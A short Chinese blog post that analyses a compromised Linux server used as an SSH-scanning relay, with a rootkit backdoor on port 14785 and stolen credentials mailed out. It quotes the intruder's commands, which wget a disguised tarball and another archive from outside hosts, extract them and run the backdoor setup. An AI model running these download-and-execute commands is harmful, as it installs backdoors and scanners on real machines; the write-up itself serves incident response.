文章详情

分析一台被入侵的linux服务器

  客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下

  黑客进入服务器后所做的操作:

  1.       向/var/tmp/下上传了两个恶意程序

  其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

  2.       入侵者登陆记录

  85.120.78.140的IP来自罗马尼亚。

  3.       wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg

  wget adelinuangell.lx.ro/ryo.tar

  tar xvf ryo.tar

  cd .access.log

  ./config Ady 14785

  ./run

  结束进程。删掉程序。。删掉用户。修改root密码。

博聚网